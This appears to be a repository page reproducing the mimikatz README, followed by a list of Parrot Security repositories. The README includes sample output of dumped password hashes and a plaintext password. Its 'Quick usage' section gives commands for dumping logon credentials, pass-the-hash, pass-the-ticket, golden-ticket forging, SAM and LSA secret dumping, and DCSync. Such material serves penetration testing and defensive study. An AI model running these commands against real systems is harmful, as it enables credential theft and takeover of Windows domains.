• Stars
    star
    688
  • Rank 65,712 (Top 2 %)
  • Language YARA
  • Created over 8 years ago
  • Updated over 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

mimikatz

mimikatz is a tool I've made to learn C and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Synchronize!

Build the solution

  • After opening the solution, Build / Build Solution (you can change architecture)
  • mimikatz is now built and ready to be used! (Win32 / x64 even ARM64 if you're lucky)
    • you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

mimikatz needs coffee to be developed:

Author

  • Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
  • DCSync and DCShadow functions in lsadump module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

More Repositories

1

anonsurf

parrot anonymous mode
Nim
289
star
2

shellter

100
star
3

parrotsec.org-old

parrot website
CSS
74
star
4

parrot-wallpapers

Makefile
72
star
5

alternate-install

Shell
67
star
6

parrot-tools

62
star
7

linux-parrot

linux kernel for Parrot Project
C
47
star
8

parrot-themes

CSS
43
star
9

car-hacking-tools

C
40
star
10

parrot-build

parrot build config folder for live-build
Python
33
star
11

parrot-core

Files to include in the package parrot-core.
Shell
32
star
12

hexinject

HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
C
20
star
13

debian-installer

debian installer for parrot security
Shell
19
star
14

realtek-rtl88xxau-dkms

C
19
star
15

metasploit-framework

Ruby
19
star
16

parrot-arm-builder

ParrotSec rootfs arm (armhf at the moment) builder.
Shell
16
star
17

parrot-raspberrypi-imgbuilder

ParrotSec Raspberry PI armhf image builder.
Shell
15
star
18

spiderfoot

Python
15
star
19

nmap

nmap repository for parrot security os
Lua
14
star
20

bettercap

Go
13
star
21

parrot-menu

backup repository https://dev.parrotsec.org/parrot/parrot-menu/
Nim
13
star
22

seren

C
12
star
23

theharvester

Python
11
star
24

wifite

Python
10
star
25

parrot-arm-imgbuilder

ParrotSec armhf image builder.
Shell
10
star
26

parrot-conky

Lua
9
star
27

changelog

9
star
28

airgeddon

Shell
8
star
29

tasksel

Perl
7
star
30

parrot-software-center

Parrot Software Center mirror repo. Main development is done at https://nest.parrotsec.org/parrot-packages/parrot-software-center
Python
7
star
31

debootstrap

Shell
7
star
32

parrot-anon

Makefile
7
star
33

torrent-generator

generate torrent files using parrot mirrors as webseeds webseeds
Shell
6
star
34

init-system-helpers

init scripts modified in order to avoid automatic services startup
Perl
6
star
35

zaproxy

JavaScript
6
star
36

parrot-interface

JavaScript
6
star
37

apt-parrot

Shell
6
star
38

w3af

Python
5
star
39

documentation

JavaScript
5
star
40

website

TypeScript
5
star
41

backdoor-factory

Python
5
star
42

set

Python
5
star
43

softether-vpn

C
5
star
44

firmware-nonfree

C
4
star
45

mirrordirector

Mirror redirector for the Parrot Security repository
Go
4
star
46

parrotsec.org

source code of the parrotsec.org website
HTML
4
star
47

encryptpad

C++
4
star
48

parrot-updater

Nim
4
star
49

base-files

Roff
4
star
50

infrastructure

Makefile
4
star
51

penmode2

Penmode 2 Frozenbox Edition
Shell
4
star
52

rtlsdr-scanner

Python
4
star
53

commix

Python
4
star
54

mitmf

Python
4
star
55

parrot-archive-keyring

Makefile
4
star
56

joomscan

Perl
4
star
57

ollydbg

3
star
58

desktop-base

Makefile
3
star
59

blueman

Makefile
3
star
60

live-config

Roff
3
star
61

gnupg2

C
3
star
62

rdd

forensic remake of DD
C
3
star
63

live-build

Shell
3
star
64

parrot-packages-hub

Shell
3
star
65

bdfproxy

JavaScript
3
star
66

geany

parrot revision of Geany, a lightweight but powerful multilanguage IDE
C
3
star
67

parrot-sounds

3
star
68

pompem

pompem package updated by parrot security
Python
3
star
69

bulk-extractor

C++
2
star
70

golang

Go
2
star
71

gdb-gef

Python
2
star
72

zulucrypt

C
2
star
73

vbyscan

Python
2
star
74

wpscan

Ruby
2
star
75

parrot-skel

Scheme
2
star
76

lightdm-parrot

lightdm configurations
2
star
77

armitage

package sources for armitage
Java
2
star
78

houston

C++
2
star
79

dpkg

C
2
star
80

parrot-installer

the Parrot Project system installer
C++
2
star
81

linux-latest

metapackages for the latest linux kernel
2
star
82

parrot-plymouth

Shell
2
star
83

opensnitch

opensnitch packaging for Parrot Security
Python
2
star
84

python-aiohttp-socks

Python
2
star
85

rootskel-gtk

Makefile
2
star
86

hexchat

hexchat repository for Parrot
C
1
star
87

policykit-1

C
1
star
88

parrot-upgrade-manager

Shell
1
star
89

parrot-drivers

1
star
90

hashcat

C
1
star
91

partman-btrfs

Shell
1
star
92

mate-terminal

C
1
star
93

debian-installer-launcher

Shell
1
star
94

cryptsetup

C
1
star
95

roboclue

Nim
1
star
96

python-apt

C++
1
star
97

bumblebee

C
1
star
98

choose-mirror

mirror chooser udeb for debian installer (parrot edition)
Perl
1
star
99

krita

C++
1
star
100

cobuild

parrot build tool for deb packages using containers
Shell
1
star